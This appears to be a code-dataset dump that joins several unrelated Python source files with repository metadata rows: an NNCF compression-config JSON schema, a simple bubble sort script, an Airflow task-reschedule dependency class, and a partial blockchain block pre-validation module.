IGNORED_SCOPES_DESCRIPTION = "A list of model control flow graph node scopes to be ignored for this " \
"operation - functions as a 'blacklist'. Optional."
TARGET_SCOPES_DESCRIPTION = "A list of model control flow graph node scopes to be considered for this operation" \
" - functions as a 'whitelist'. Optional."
QUANTIZER_GROUP_PROPERTIES = {
**QUANTIZER_CONFIG_PROPERTIES,
"ignored_scopes": with_attributes(make_object_or_array_of_objects_schema(_STRING),
description=IGNORED_SCOPES_DESCRIPTION),
"target_scopes": with_attributes(make_object_or_array_of_objects_schema(_STRING),
description=TARGET_SCOPES_DESCRIPTION)
}
WEIGHTS_GROUP_SCHEMA = {
"type": "object",
"properties": {
**QUANTIZER_GROUP_PROPERTIES,
},
"additionalProperties": False
}
LINKED_ACTIVATION_SCOPES_SPECIFIER_SCHEMA = {
"type": "array",
"items": _ARRAY_OF_STRINGS
}
ACTIVATIONS_GROUP_SCHEMA = {
"type": "object",
"properties": {
**QUANTIZER_GROUP_PROPERTIES,
"linked_quantizer_scopes": with_attributes(LINKED_ACTIVATION_SCOPES_SPECIFIER_SCHEMA,
description="Specifies points in the model which will share the "
"same quantizer module for activations. This is helpful "
"in case one and the same quantizer scale is required "
"for inputs to the same operation. Each sub-array will"
"define a group of activation quantizer insertion "
"points that have to share a single actual "
"quantization module, each entry in this subarray "
"should correspond to exactly one node in the NNCF "
"graph and the groups should not overlap. The final"
"quantizer for each sub-array will be associated with "
"the first element of this sub-array.")
},
"additionalProperties": False
}
GENERIC_INITIALIZER_SCHEMA = {
"type": "object",
"properties": {
"batchnorm_adaptation":
{
"type": "object",
"properties": {
"num_bn_adaptation_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"procedure for the compressed model"),
"num_bn_forget_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"in the initial statistics forgetting step"),
},
"additionalProperties": False,
},
},
"additionalProperties": False,
}
RANGE_INIT_CONFIG_PROPERTIES = {
"initializer": {
"type": "object",
"properties": {
"range": {
"type": "object",
"properties": {
"num_init_steps": with_attributes(_NUMBER,
description="Number of batches from the training dataset to "
"consume as sample model inputs for purposes of "
"setting initial minimum and maximum quantization "
"ranges"),
"type": with_attributes(_STRING, description="Type of the initializer - determines which "
"statistics gathered during initialization will be "
"used to initialize the quantization ranges"),
"min_percentile": with_attributes(_NUMBER,
description="For 'percentile' type - specify the percentile of "
"input value histograms to be set as the initial "
"value for minimum quantizer input"),
"max_percentile": with_attributes(_NUMBER,
description="For 'percentile' type - specify the percentile of "
"input value histograms to be set as the initial "
"value for maximum quantizer input"),
},
"additionalProperties": False,
},
},
"additionalProperties": False,
},
}
QUANTIZATION_INITIALIZER_SCHEMA = {
"type": "object",
"properties": {
"batchnorm_adaptation":
{
"type": "object",
"properties": {
"num_bn_adaptation_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"procedure for the compressed model"),
"num_bn_forget_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"in the initial statistics forgetting step"),
},
"additionalProperties": False,
},
**RANGE_INIT_CONFIG_PROPERTIES["initializer"]["properties"],
"precision":
{
"type": "object",
"properties": {
"type": with_attributes(_STRING,
description="Type of precision initialization."),
"bits": with_attributes(_ARRAY_OF_NUMBERS,
description="A list of bitwidth to choose from when "
"performing precision initialization.",
examples=[[4, 8]]),
"num_data_points": with_attributes(_NUMBER,
description="Number of data points to iteratively estimate "
"Hessian trace, 200 by default."),
"iter_number": with_attributes(_NUMBER,
description="Maximum number of iterations of Hutchinson algorithm "
"to Estimate Hessian trace, 200 by default"),
"tolerance": with_attributes(_NUMBER,
description="Minimum relative tolerance for stopping the Hutchinson "
"algorithm. It's calculated between mean average trace "
"from previous iteration and current one. 1e-5 by default"
"bitwidth_per_scope"),
"bitwidth_per_scope": {
"type": "array",
"items": {
"type": "array",
"items":
[
_NUMBER,
_STRING
],
"description": "A tuple of a bitwidth and a scope of the quantizer to assign the "
"bitwidth to."
},
"description": "Manual settings for the quantizer bitwidths. Scopes are used to identify "
"the quantizers."
}
},
"additionalProperties": False,
}
},
"additionalProperties": False,
}
COMMON_COMPRESSION_ALGORITHM_PROPERTIES = {
"ignored_scopes": with_attributes(make_string_or_array_of_strings_schema(),
description=IGNORED_SCOPES_DESCRIPTION),
"target_scopes": with_attributes(make_string_or_array_of_strings_schema(),
description=TARGET_SCOPES_DESCRIPTION),
}
BASIC_COMPRESSION_ALGO_SCHEMA = {
"type": "object",
"required": ["algorithm"]
}
STAGED_QUANTIZATION_PARAMS = {
"params": {
"type": "object",
"properties": {
"batch_multiplier": with_attributes(_NUMBER,
description="Gradients will be accumulated for this number of "
"batches before doing a 'backward' call. Increasing "
"this may improve training quality, since binarized "
"networks exhibit noisy gradients requiring larger "
"batch sizes than could be accomodated by GPUs"),
"activations_quant_start_epoch": with_attributes(_NUMBER,
description="Epoch to start binarizing activations"),
"weights_quant_start_epoch": with_attributes(_NUMBER,
description="Epoch to start binarizing weights"),
"lr_poly_drop_start_epoch": with_attributes(_NUMBER,
description="Epoch to start dropping the learning rate"),
"lr_poly_drop_duration_epochs": with_attributes(_NUMBER,
description="Duration, in epochs, of the learning "
"rate dropping process."),
"disable_wd_start_epoch": with_attributes(_NUMBER,
description="Epoch to disable weight decay in the optimizer"),
"base_lr": with_attributes(_NUMBER, description="Initial value of learning rate"),
"base_wd": with_attributes(_NUMBER, description="Initial value of weight decay"),
},
"additionalProperties": False
}
}
QUANTIZATION_ALGO_NAME_IN_CONFIG = "quantization"
QUANTIZATION_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": QUANTIZATION_ALGO_NAME_IN_CONFIG
},
"initializer": QUANTIZATION_INITIALIZER_SCHEMA,
"weights": with_attributes(WEIGHTS_GROUP_SCHEMA,
description="Constraints to be applied to model weights quantization only. "
"Overrides higher-level settings."),
"activations": with_attributes(ACTIVATIONS_GROUP_SCHEMA,
description="Constraints to be applied to model activations quantization only. "
"Overrides higher-level settings."),
"quantize_inputs": with_attributes(_BOOLEAN,
description="Whether the model inputs should be immediately quantized prior "
"to any other model operations.",
default=True),
"quantize_outputs": with_attributes(_BOOLEAN,
description="Whether the model outputs should be additionally quantized.",
default=False),
"quantizable_subgraph_patterns": {
"type": "array",
"items": make_string_or_array_of_strings_schema(),
"description": "Each sub-list in this list will correspond to a sequence of operations in the "
"model control flow graph that will have a quantizer appended at the end of the "
"sequence",
"examples": [["cat", "batch_norm"], "h_swish"]
},
"scope_overrides": {
"type": "object",
"patternProperties": {
".*": {
"type": "object",
"properties": {
**QUANTIZER_CONFIG_PROPERTIES,
**RANGE_INIT_CONFIG_PROPERTIES,
},
"additionalProperties": False
},
},
"description": "This option is used to specify overriding quantization constraints for specific scope,"
"e.g. in case you need to quantize a single operation differently than the rest of the "
"model."
},
"export_to_onnx_standard_ops": with_attributes(_BOOLEAN,
description="Determines how should the additional quantization "
"operations be exported into the ONNX format. Set "
"this to false for export to OpenVINO-supported "
"FakeQuantize ONNX, or to true for export to ONNX "
"standard QuantizeLinear-DequantizeLinear "
"node pairs (8-bit quantization only in the latter "
"case). Default: false"),
**STAGED_QUANTIZATION_PARAMS,
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES,
},
"additionalProperties": False
}
BINARIZATION_ALGO_NAME_IN_CONFIG = "binarization"
BINARIZATION_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": BINARIZATION_ALGO_NAME_IN_CONFIG
},
"initializer": QUANTIZATION_INITIALIZER_SCHEMA,
"mode": with_attributes(_STRING,
description="Selects the mode of binarization - either 'xnor' for XNOR binarization,"
"or 'dorefa' for DoReFa binarization"),
**STAGED_QUANTIZATION_PARAMS,
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
CONST_SPARSITY_ALGO_NAME_IN_CONFIG = "const_sparsity"
CONST_SPARSITY_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": CONST_SPARSITY_ALGO_NAME_IN_CONFIG
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES,
},
"additionalProperties": False,
"description": "This algorithm takes no additional parameters and is used when you want to load "
"a checkpoint trained with another sparsity algorithm and do other compression without "
"changing the sparsity mask."
}
COMMON_SPARSITY_PARAM_PROPERTIES = {
"schedule": with_attributes(_STRING,
description="The type of scheduling to use for adjusting the target"
"sparsity level"),
"patience": with_attributes(_NUMBER,
description="A regular patience parameter for the scheduler, "
"as for any other standard scheduler. Specified in units "
"of scheduler steps."),
"power": with_attributes(_NUMBER,
description="For polynomial scheduler - determines the corresponding power value."),
"concave": with_attributes(_BOOLEAN, description="For polynomial scheduler - if True, then the target sparsity "
"level will be approached in concave manner, and in convex "
"manner otherwise."),
"sparsity_init": with_attributes(_NUMBER,
description="Initial value of the sparsity level applied to the "
"model"),
"sparsity_target": with_attributes(_NUMBER,
description="Target value of the sparsity level for the model"),
"sparsity_target_epoch": with_attributes(_NUMBER,
description="The target sparsity value will be reached after this many"
"epoch steps"),
"sparsity_freeze_epoch": with_attributes(_NUMBER,
description="The number of epoch steps after which the "
"sparsity mask will be frozen and no "
"longer trained"),
"update_per_optimizer_step": with_attributes(_BOOLEAN,
description="Whether the function-based sparsity level schedulers "
"should update the sparsity level after each optimizer "
"step instead of each epoch step."),
"steps_per_epoch": with_attributes(_NUMBER,
description="Number of optimizer steps in one epoch. Required to start proper "
" scheduling in the first training epoch if "
"'update_per_optimizer_step' is true"),
"multistep_steps": with_attributes(_ARRAY_OF_NUMBERS,
description="A list of scheduler steps at which to transition "
"to the next scheduled sparsity level (multistep "
"scheduler only)."),
"multistep_sparsity_levels": with_attributes(_ARRAY_OF_NUMBERS,
description="Levels of sparsity to use at each step "
"of the scheduler as specified in the "
"'multistep_steps' attribute. The first"
"sparsity level will be applied "
"immediately, so the length of this list "
"should be larger than the length of the "
"'steps' by one.")
}
MAGNITUDE_SPARSITY_ALGO_NAME_IN_CONFIG = "magnitude_sparsity"
MAGNITUDE_SPARSITY_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": MAGNITUDE_SPARSITY_ALGO_NAME_IN_CONFIG
},
"initializer": GENERIC_INITIALIZER_SCHEMA,
"params":
{
"type": "object",
"properties": {
**COMMON_SPARSITY_PARAM_PROPERTIES,
"weight_importance": with_attributes(_STRING,
description="Determines the way in which the weight values "
"will be sorted after being aggregated in order "
"to determine the sparsity threshold "
"corresponding to a specific sparsity level. "
"Either 'abs' or 'normed_abs'.",
default="normed_abs")
},
"additionalProperties": False
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
RB_SPARSITY_ALGO_NAME_IN_CONFIG = "rb_sparsity"
RB_SPARSITY_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": RB_SPARSITY_ALGO_NAME_IN_CONFIG
},
"params":
{
"type": "object",
"properties": COMMON_SPARSITY_PARAM_PROPERTIES,
"additionalProperties": False
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
FILTER_PRUNING_ALGO_NAME_IN_CONFIG = 'filter_pruning'
FILTER_PRUNING_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": FILTER_PRUNING_ALGO_NAME_IN_CONFIG
},
"initializer": GENERIC_INITIALIZER_SCHEMA,
"params":
{
"type": "object",
"properties": {
"schedule": with_attributes(_STRING,
description="The type of scheduling to use for adjusting the target"
" pruning level. Either `exponential`, `exponential_with"
"_bias`, or `baseline`, by default it is `baseline`"),
"pruning_init": with_attributes(_NUMBER,
description="Initial value of the pruning level applied to the"
" model. 0.0 by default."),
"pruning_target": with_attributes(_NUMBER,
description="Target value of the pruning level for the model."
" 0.5 by default."),
"num_init_steps": with_attributes(_NUMBER,
description="Number of epochs for model pretraining before"
" starting filter pruning. 0 by default."),
"pruning_steps": with_attributes(_NUMBER,
description="Number of epochs during which the pruning rate is"
" increased from `pruning_init` to `pruning_target`"
" value."),
"weight_importance": with_attributes(_STRING,
description="The type of filter importance metric. Can be"
" one of `L1`, `L2`, `geometric_median`."
" `L2` by default."),
"all_weights": with_attributes(_BOOLEAN,
description="Whether to prune layers independently (choose filters"
" with the smallest importance in each layer separately)"
" or not. `False` by default.",
default=False),
"prune_first_conv": with_attributes(_BOOLEAN,
description="Whether to prune first Convolutional layers or"
" not. First means that it is a convolutional layer"
" such that there is a path from model input to "
"this layer such that there are no other "
"convolution operations on it. `False` by default.",
default=False
),
"prune_last_conv": with_attributes(_BOOLEAN,
description="whether to prune last Convolutional layers or not."
" Last means that it is a Convolutional layer such"
" that there is a path from this layer to the model"
" output such that there are no other convolution"
" operations on it. `False` by default. ",
default=False
),
"prune_downsample_convs": with_attributes(_BOOLEAN,
description="whether to prune downsample Convolutional"
" layers (with stride > 1) or not. `False`"
" by default.",
default=False
),
"prune_batch_norms": with_attributes(_BOOLEAN,
description="whether to nullifies parameters of Batch Norm"
" layer corresponds to zeroed filters of"
" convolution corresponding to this Batch Norm."
" `False` by default.",
default=False
),
"zero_grad": with_attributes(_BOOLEAN,
description="Whether to setting gradients corresponding to zeroed"
" filters to zero during training, `True` by default.",
default=True),
},
"additionalProperties": False,
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
ALL_SUPPORTED_ALGO_SCHEMAE = [BINARIZATION_SCHEMA,
QUANTIZATION_SCHEMA,
CONST_SPARSITY_SCHEMA,
MAGNITUDE_SPARSITY_SCHEMA,
RB_SPARSITY_SCHEMA,
FILTER_PRUNING_SCHEMA]
REF_VS_ALGO_SCHEMA = {BINARIZATION_ALGO_NAME_IN_CONFIG: BINARIZATION_SCHEMA,
QUANTIZATION_ALGO_NAME_IN_CONFIG: QUANTIZATION_SCHEMA,
CONST_SPARSITY_ALGO_NAME_IN_CONFIG: CONST_SPARSITY_SCHEMA,
MAGNITUDE_SPARSITY_ALGO_NAME_IN_CONFIG: MAGNITUDE_SPARSITY_SCHEMA,
RB_SPARSITY_ALGO_NAME_IN_CONFIG: RB_SPARSITY_SCHEMA,
FILTER_PRUNING_ALGO_NAME_IN_CONFIG: FILTER_PRUNING_SCHEMA}
ROOT_NNCF_CONFIG_SCHEMA = {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": "object",
"properties": {
"input_info": with_attributes(make_object_or_array_of_objects_schema(SINGLE_INPUT_INFO_SCHEMA),
description="Required - describe the specifics of your model inputs here."
"This information is used to build the internal graph representation"
"that is leveraged for proper compression functioning, and for "
"exporting the compressed model to ONNX."),
"disable_shape_matching": with_attributes(_BOOLEAN,
description="Whether to enable strict input tensor"
"shape matching when building the internal graph"
"representation of the model. Set this to false if your"
"model inputs have any variable dimension other than "
"the 0-th (batch) dimension, or if any non-batch "
"dimension of the intermediate tensors in your model "
"execution flow depends on the input dimension,"
"otherwise the compression will most likely fail."),
# Validation of each separate compression description schema occurs in a separate step.
# This is required for better user feedback, since holistic schema validation is uninformative
# if there is an error in one of the compression configs.
"compression": make_object_or_array_of_objects_schema(BASIC_COMPRESSION_ALGO_SCHEMA),
"hw_config_type": with_attributes(_STRING,
description="If specified, the compression algorithms will use parameter "
"presets that are more likely to result in best performance on "
"a given HW type."),
"log_dir": with_attributes(_STRING,
description="Log directory for NNCF-specific logging outputs"),
"quantizer_setup_type": with_attributes(_STRING,
description="Selects the mode of placement quantizers - either "
"'pattern_based' or 'propagation_based'. "
"In 'pattern_based' mode, the quantizers are placed "
"according to the accepted patterns (Each pattern is "
"a layer or a set of layers to be quantized). "
"In 'propagation_based' initially quantizers are placed "
"on all possible quantized layers and then the algorithm "
"their propagation is run from the bottom up. Also in "
"this mode it is possible to use hw config."),
},
"required": ["input_info"],
"definitions": REF_VS_ALGO_SCHEMA,
"dependencies": {
"hw_config_type": {
"properties": {
"quantizer_setup_type": { "const": "propagation_based"}}
}
}
}
def validate_single_compression_algo_schema(single_compression_algo_dict: Dict):
"""single_compression_algo_dict must conform to BASIC_COMPRESSION_ALGO_SCHEMA (and possibly has other
algo-specific properties"""
algo_name = single_compression_algo_dict["algorithm"]
if algo_name not in REF_VS_ALGO_SCHEMA:
raise jsonschema.ValidationError(
"Incorrect algorithm name - must be one of ({})".format(", ".join(REF_VS_ALGO_SCHEMA.keys())))
try:
jsonschema.validate(single_compression_algo_dict, schema=REF_VS_ALGO_SCHEMA[algo_name])
except Exception as e:
import sys
raise type(e)("For algorithm: '{}'\n".format(algo_name) + str(e)).with_traceback(sys.exc_info()[2])
| 57.415902
| 120
| 0.463249
|
55525f956af9d66ba722c4708c2d15e81ed5cd6d
| 918
|
py
|
Python
|
bubbleSort.py
|
ManishSreerangam/SortingAlgorithms
|
542b729353e2740e8baa6e88ac1adc8bd84dfd43
|
[
"Apache-2.0"
] | null | null | null |
bubbleSort.py
|
ManishSreerangam/SortingAlgorithms
|
542b729353e2740e8baa6e88ac1adc8bd84dfd43
|
[
"Apache-2.0"
] | null | null | null |
bubbleSort.py
|
ManishSreerangam/SortingAlgorithms
|
542b729353e2740e8baa6e88ac1adc8bd84dfd43
|
[
"Apache-2.0"
] | null | null | null |
"""
Bubble sort : The bubble sort algorithm repeatedly scans through the list,
comparing adjacent elements and swapping them if they are in wrong order.
"""
def bubble(list1):
for i in range(1 ,x): #number of passes n-1 passes
for j in range(0 , x-i ): #comparison .. x-i because there is no need to compare list item after 1 compariosion
if list1[j] > list1[j+1]:
temp = 0
temp = list1[j]
list1[j]= list1[j+1]
list1[j+1] = temp
else:
continue
print(list1)
x = int(input("Enter the total number of elements in a list : "))
list1 = [ ]
for i in range(x): # taking values of list
list1.append(input("Enter number {} \t ".format(i+1)))
bubble(list1)
"""
Order of growth ----> Quadratic ----> BIG O (n^2)
algorithm is best suitable for smaller data sets
"""
| 38.25
| 121
| 0.570806
|
5f3530c2b5fc9b1bb4c839fe57e5967423721571
| 3,125
|
py
|
Python
|
airflow/ti_deps/deps/ready_to_reschedule.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 1
|
2020-09-15T02:32:55.000Z
|
2020-09-15T02:32:55.000Z
|
airflow/ti_deps/deps/ready_to_reschedule.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 20
|
2021-01-23T12:33:08.000Z
|
2021-12-07T22:30:37.000Z
|
airflow/ti_deps/deps/ready_to_reschedule.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 2
|
2020-03-08T14:12:55.000Z
|
2020-06-10T10:17:32.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.models.taskreschedule import TaskReschedule
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.utils import timezone
from airflow.utils.session import provide_session
from airflow.utils.state import State
class ReadyToRescheduleDep(BaseTIDep):
"""
Determines whether a task is ready to be rescheduled.
"""
NAME = "Ready To Reschedule"
IGNOREABLE = True
IS_TASK_DEP = True
RESCHEDULEABLE_STATES = {State.UP_FOR_RESCHEDULE, State.NONE}
@provide_session
def _get_dep_statuses(self, ti, session, dep_context):
"""
Determines whether a task is ready to be rescheduled. Only tasks in
NONE state with at least one row in task_reschedule table are
handled by this dependency class, otherwise this dependency is
considered as passed. This dependency fails if the latest reschedule
request's reschedule date is still in future.
"""
if dep_context.ignore_in_reschedule_period:
yield self._passing_status(
reason="The context specified that being in a reschedule period was "
"permitted.")
return
if ti.state not in self.RESCHEDULEABLE_STATES:
yield self._passing_status(
reason="The task instance is not in State_UP_FOR_RESCHEDULE or NONE state.")
return
task_reschedule = (
TaskReschedule.query_for_task_instance(task_instance=ti, descending=True, session=session)
.with_entities(TaskReschedule.reschedule_date)
.first()
)
if not task_reschedule:
yield self._passing_status(
reason="There is no reschedule request for this task instance.")
return
now = timezone.utcnow()
next_reschedule_date = task_reschedule.reschedule_date
if now >= next_reschedule_date:
yield self._passing_status(
reason="Task instance id ready for reschedule.")
return
yield self._failing_status(
reason="Task is not ready for reschedule yet but will be rescheduled "
"automatically. Current date is {0} and task will be rescheduled "
"at {1}.".format(now.isoformat(), next_reschedule_date.isoformat()))
| 41.118421
| 102
| 0.6896
|
11bf0939164121ee93e421d30a079b1874b2ec94
| 16,117
|
py
|
Python
|
spare/consensus/multiprocess_validation.py
|
zcomputerwiz/sparev2-blockchain
|
ce4344321de909704ad8df9785299da25761059e
|
[
"Apache-2.0"
] | 3
|
2021-11-20T16:21:45.000Z
|
2022-02-09T04:33:04.000Z
|
spare/consensus/multiprocess_validation.py
|
zcomputerwiz/sparev2-blockchain
|
ce4344321de909704ad8df9785299da25761059e
|
[
"Apache-2.0"
] | null | null | null |
spare/consensus/multiprocess_validation.py
|
zcomputerwiz/sparev2-blockchain
|
ce4344321de909704ad8df9785299da25761059e
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import logging
import traceback
from concurrent.futures.process import ProcessPoolExecutor
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple, Union, Callable
from spare.consensus.block_header_validation import validate_finished_header_block
from spare.consensus.block_record import BlockRecord
from spare.consensus.blockchain_interface import BlockchainInterface
from spare.consensus.constants import ConsensusConstants
from spare.consensus.cost_calculator import NPCResult
from spare.consensus.difficulty_adjustment import get_next_sub_slot_iters_and_difficulty
from spare.consensus.full_block_to_block_record import block_to_block_record
from spare.consensus.get_block_challenge import get_block_challenge
from spare.consensus.pot_iterations import calculate_iterations_quality, is_overflow_block
from spare.full_node.mempool_check_conditions import get_name_puzzle_conditions
from spare.types.blockchain_format.coin import Coin
from spare.types.blockchain_format.sized_bytes import bytes32
from spare.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from spare.types.full_block import FullBlock
from spare.types.generator_types import BlockGenerator
from spare.types.header_block import HeaderBlock
from spare.types.unfinished_block import UnfinishedBlock
from spare.util.block_cache import BlockCache
from spare.util.errors import Err, ValidationError
from spare.util.generator_tools import get_block_header, tx_removals_and_additions
from spare.util.ints import uint16, uint64, uint32
from spare.util.streamable import Streamable, dataclass_from_dict, streamable
log = logging.getLogger(__name__)
@dataclass(frozen=True)
@streamable
class PreValidationResult(Streamable):
error: Optional[uint16]
required_iters: Optional[uint64] # Iff error is None
npc_result: Optional[NPCResult] # Iff error is None and block is a transaction block
def batch_pre_validate_blocks(
constants_dict: Dict,
blocks_pickled: Dict[bytes, bytes],
full_blocks_pickled: Optional[List[bytes]],
header_blocks_pickled: Optional[List[bytes]],
prev_transaction_generators: List[Optional[bytes]],
npc_results: Dict[uint32, bytes],
check_filter: bool,
expected_difficulty: List[uint64],
expected_sub_slot_iters: List[uint64],
) -> List[bytes]:
blocks = {}
for k, v in blocks_pickled.items():
blocks[k] = BlockRecord.from_bytes(v)
results: List[PreValidationResult] = []
constants: ConsensusConstants = dataclass_from_dict(ConsensusConstants, constants_dict)
if full_blocks_pickled is not None and header_blocks_pickled is not None:
assert ValueError("Only one should be passed here")
if full_blocks_pickled is not None:
for i in range(len(full_blocks_pickled)):
try:
block: FullBlock = FullBlock.from_bytes(full_blocks_pickled[i])
tx_additions: List[Coin] = []
removals: List[bytes32] = []
npc_result: Optional[NPCResult] = None
if block.height in npc_results:
npc_result = NPCResult.from_bytes(npc_results[block.height])
assert npc_result is not None
if npc_result.npc_list is not None:
removals, tx_additions = tx_removals_and_additions(npc_result.npc_list)
else:
removals, tx_additions = [], []
if block.transactions_generator is not None and npc_result is None:
prev_generator_bytes = prev_transaction_generators[i]
assert prev_generator_bytes is not None
assert block.transactions_info is not None
block_generator: BlockGenerator = BlockGenerator.from_bytes(prev_generator_bytes)
assert block_generator.program == block.transactions_generator
npc_result = get_name_puzzle_conditions(
block_generator,
min(constants.MAX_BLOCK_COST_CLVM, block.transactions_info.cost),
cost_per_byte=constants.COST_PER_BYTE,
safe_mode=True,
)
removals, tx_additions = tx_removals_and_additions(npc_result.npc_list)
header_block = get_block_header(block, tx_additions, removals)
required_iters, error = validate_finished_header_block(
constants,
BlockCache(blocks),
header_block,
check_filter,
expected_difficulty[i],
expected_sub_slot_iters[i],
)
error_int: Optional[uint16] = None
if error is not None:
error_int = uint16(error.code.value)
results.append(PreValidationResult(error_int, required_iters, npc_result))
except Exception:
error_stack = traceback.format_exc()
log.error(f"Exception: {error_stack}")
results.append(PreValidationResult(uint16(Err.UNKNOWN.value), None, None))
elif header_blocks_pickled is not None:
for i in range(len(header_blocks_pickled)):
try:
header_block = HeaderBlock.from_bytes(header_blocks_pickled[i])
required_iters, error = validate_finished_header_block(
constants,
BlockCache(blocks),
header_block,
check_filter,
expected_difficulty[i],
expected_sub_slot_iters[i],
)
error_int = None
if error is not None:
error_int = uint16(error.code.value)
results.append(PreValidationResult(error_int, required_iters, None))
except Exception:
error_stack = traceback.format_exc()
log.error(f"Exception: {error_stack}")
results.append(PreValidationResult(uint16(Err.UNKNOWN.value), None, None))
return [bytes(r) for r in results]
async def pre_validate_blocks_multiprocessing(
constants: ConsensusConstants,
constants_json: Dict,
block_records: BlockchainInterface,
blocks: Sequence[Union[FullBlock, HeaderBlock]],
pool: ProcessPoolExecutor,
check_filter: bool,
npc_results: Dict[uint32, NPCResult],
get_block_generator: Optional[Callable],
batch_size: int,
wp_summaries: Optional[List[SubEpochSummary]] = None,
) -> Optional[List[PreValidationResult]]:
"""
This method must be called under the blockchain lock
If all the full blocks pass pre-validation, (only validates header), returns the list of required iters.
if any validation issue occurs, returns False.
Args:
check_filter:
constants_json:
pool:
constants:
block_records:
blocks: list of full blocks to validate (must be connected to current chain)
npc_results
get_block_generator
"""
prev_b: Optional[BlockRecord] = None
# Collects all the recent blocks (up to the previous sub-epoch)
recent_blocks: Dict[bytes32, BlockRecord] = {}
recent_blocks_compressed: Dict[bytes32, BlockRecord] = {}
num_sub_slots_found = 0
num_blocks_seen = 0
if blocks[0].height > 0:
if not block_records.contains_block(blocks[0].prev_header_hash):
return [PreValidationResult(uint16(Err.INVALID_PREV_BLOCK_HASH.value), None, None)]
curr = block_records.block_record(blocks[0].prev_header_hash)
num_sub_slots_to_look_for = 3 if curr.overflow else 2
while (
curr.sub_epoch_summary_included is None
or num_blocks_seen < constants.NUMBER_OF_TIMESTAMPS
or num_sub_slots_found < num_sub_slots_to_look_for
) and curr.height > 0:
if num_blocks_seen < constants.NUMBER_OF_TIMESTAMPS or num_sub_slots_found < num_sub_slots_to_look_for:
recent_blocks_compressed[curr.header_hash] = curr
if curr.first_in_sub_slot:
assert curr.finished_challenge_slot_hashes is not None
num_sub_slots_found += len(curr.finished_challenge_slot_hashes)
recent_blocks[curr.header_hash] = curr
if curr.is_transaction_block:
num_blocks_seen += 1
curr = block_records.block_record(curr.prev_hash)
recent_blocks[curr.header_hash] = curr
recent_blocks_compressed[curr.header_hash] = curr
block_record_was_present = []
for block in blocks:
block_record_was_present.append(block_records.contains_block(block.header_hash))
diff_ssis: List[Tuple[uint64, uint64]] = []
for block in blocks:
if block.height != 0:
assert block_records.contains_block(block.prev_header_hash)
if prev_b is None:
prev_b = block_records.block_record(block.prev_header_hash)
sub_slot_iters, difficulty = get_next_sub_slot_iters_and_difficulty(
constants, len(block.finished_sub_slots) > 0, prev_b, block_records
)
overflow = is_overflow_block(constants, block.reward_chain_block.signage_point_index)
challenge = get_block_challenge(constants, block, BlockCache(recent_blocks), prev_b is None, overflow, False)
if block.reward_chain_block.challenge_chain_sp_vdf is None:
cc_sp_hash: bytes32 = challenge
else:
cc_sp_hash = block.reward_chain_block.challenge_chain_sp_vdf.output.get_hash()
q_str: Optional[bytes32] = block.reward_chain_block.proof_of_space.verify_and_get_quality_string(
constants, challenge, cc_sp_hash
)
if q_str is None:
for i, block_i in enumerate(blocks):
if not block_record_was_present[i] and block_records.contains_block(block_i.header_hash):
block_records.remove_block_record(block_i.header_hash)
return None
required_iters: uint64 = calculate_iterations_quality(
constants.DIFFICULTY_CONSTANT_FACTOR,
q_str,
block.reward_chain_block.proof_of_space.size,
difficulty,
cc_sp_hash,
)
block_rec = block_to_block_record(
constants,
block_records,
required_iters,
block,
None,
)
if block_rec.sub_epoch_summary_included is not None and wp_summaries is not None:
idx = int(block.height / constants.SUB_EPOCH_BLOCKS) - 1
next_ses = wp_summaries[idx]
if not block_rec.sub_epoch_summary_included.get_hash() == next_ses.get_hash():
log.error("sub_epoch_summary does not match wp sub_epoch_summary list")
return None
# Makes sure to not override the valid blocks already in block_records
if not block_records.contains_block(block_rec.header_hash):
block_records.add_block_record(block_rec) # Temporarily add block to dict
recent_blocks[block_rec.header_hash] = block_rec
recent_blocks_compressed[block_rec.header_hash] = block_rec
else:
recent_blocks[block_rec.header_hash] = block_records.block_record(block_rec.header_hash)
recent_blocks_compressed[block_rec.header_hash] = block_records.block_record(block_rec.header_hash)
prev_b = block_rec
diff_ssis.append((difficulty, sub_slot_iters))
